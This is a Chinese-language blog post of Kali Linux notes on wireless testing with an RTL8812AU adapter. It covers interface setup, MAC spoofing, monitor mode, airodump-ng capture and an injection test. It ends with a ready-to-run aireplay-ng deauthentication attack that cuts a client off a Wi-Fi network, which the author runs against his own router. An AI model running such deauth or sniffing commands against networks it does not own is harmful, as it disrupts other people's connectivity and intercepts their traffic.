Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1789883
  • 博文数量: 297
  • 博客积分: 285
  • 博客等级: 二等列兵
  • 技术积分: 3006
  • 用 户 组: 普通用户
  • 注册时间: 2010-03-06 22:04
个人简介

Linuxer, ex IBMer. GNU https://hmchzb19.github.io/

文章分类

全部博文(297)

文章存档

2020年(11)

2019年(15)

2018年(43)

2017年(79)

2016年(79)

2015年(58)

2014年(1)

2013年(8)

2012年(3)

分类: LINUX

2017-09-25 19:09:41

参看前文,我使用的是RTL8812AU网卡,这块网卡从2017 kali.1 开始提供支持,应该算是块小神卡.

#打开无线网卡电源
iwconfig wlan0 txpower on
#列出区域内的无线网络SSID
iwlist wlan0 scan
#链接到某个网络
iwconfig wlan0 essid "YOURESSID" key "YOURPASSWORD"
#查看各种参数
iwconfig wlan0
#关闭或者启动网卡
iwconfig wlan0 up/down
#DHCP 获取
dhclient wlan0

#ubuntu/kali 无线网卡网卡配置静态IP地址
#---------------------------------------
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.1.11
netmask 255.255.255.0

auto wlan0
iface wlan0 inet static
address 192.168.0.104
netmask 255.255.255.0
gateway 192.168.0.1
#pre-up ip link set wlan0 up
#pre-up iwconfig wlan0 essid ssid
wpa-ssid 18102XX        #SSID
wpa-psk PASSWORD       #PASSWORD
#----------------------------------------------


#iwconfig 命令用来查看或者配置无线网卡的各种参数
iwconfig
ifconfig wlan1 down

#change mac address
macchanger --help
macchanger -s [--show]
macchanger --random wlan1

ifconfig wlan1 up

#monitor mode use airmon-ng, did not work for me with my RTL8812AU.
airmon-ng start wlan1
airmon-ng stop mon0

#config monitor mode manually
ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up
#check the monitor mode
iwconfig

#kill wpa_supplicant
airmon-ng check kill
#start to sniff on wireless lan
airodump-ng wlan1
BSSID: AP MAC address.
PWR: power, the distance
Beacons: Beacons is the routers send.
#Data: useful data sniffed
#/s:
CH: channel number
MB:
ENC: encryption
CIPHER: cracking method.
AUTH: Authentication, PSK: Pre-shared-key
ESSID: AP SSID.

#write to a file, then use wireshark to analyze it.
airodump-ng --channel[channel] --bssid[bssid] --write[file-name][interface]
eg:
airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write out mon0

#Test wireless Device Packet Injection
aireplay-ng -9 -e 18102XX -a 14:D6:XX:XX:XX:XX   wlan1
#my output is below
wlan1 is on channel 7, but the AP uses channel 2
#或者碰到 No such BSSID available.要修改wlan1的监听信道
iwconfig wlan1 channel 2
iwlist wlan1 channel
#再次执行,看到下面的100%意味着injection测试成功
aireplay-ng -9 -e 18102XX -a 14:D6:XX:XX:XX:XX wlan1
18:47:18  Ping (min/avg/max): 2.335ms/3.755ms/10.565ms Power: -40.13
18:47:18  30/30: 100%


#dump my own router ,create 4 files.
airodump-ng --channel 2 --bssid 14:D6:XX:XX:XX:XX --write out wlan1
STATION: all the MAC address below STATION means these are all clients
#ls out*
out-01.cap  out-01.csv  out-01.kismet.csv  out-01.kismet.netxml

#Deauthentication Attacks Theory
This attack is used to disconnect any device from any network within our range even
if the network if protected with a key.
Hacker sends Deauthentication packets to the router pretending to be the target
maching(by spoofing its MAC address)
At the same time, the hacker sends packets to the target machine(pretending to be the router)
telling it that it needs re-authentication itself.

#First get the clients connect to it
airodump-ng --channel 2 --bssid 14:D6:XX:XX:XX:XX wlan1
#Deauthentication attacks ,将会使MAC地址为-c "00:1E:XX:XX:XX:XX"的机器一直连不上.
aireplay-ng --deauth [number of deauth packets] -a [AP-MAC] -c[target-MAC] [interface]
aireplay-ng --deauth 100 -a "14:D6:XX:XX:XX:XX" -c "00:1E:XX:XX:XX:XX" wlan1

阅读(2183) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~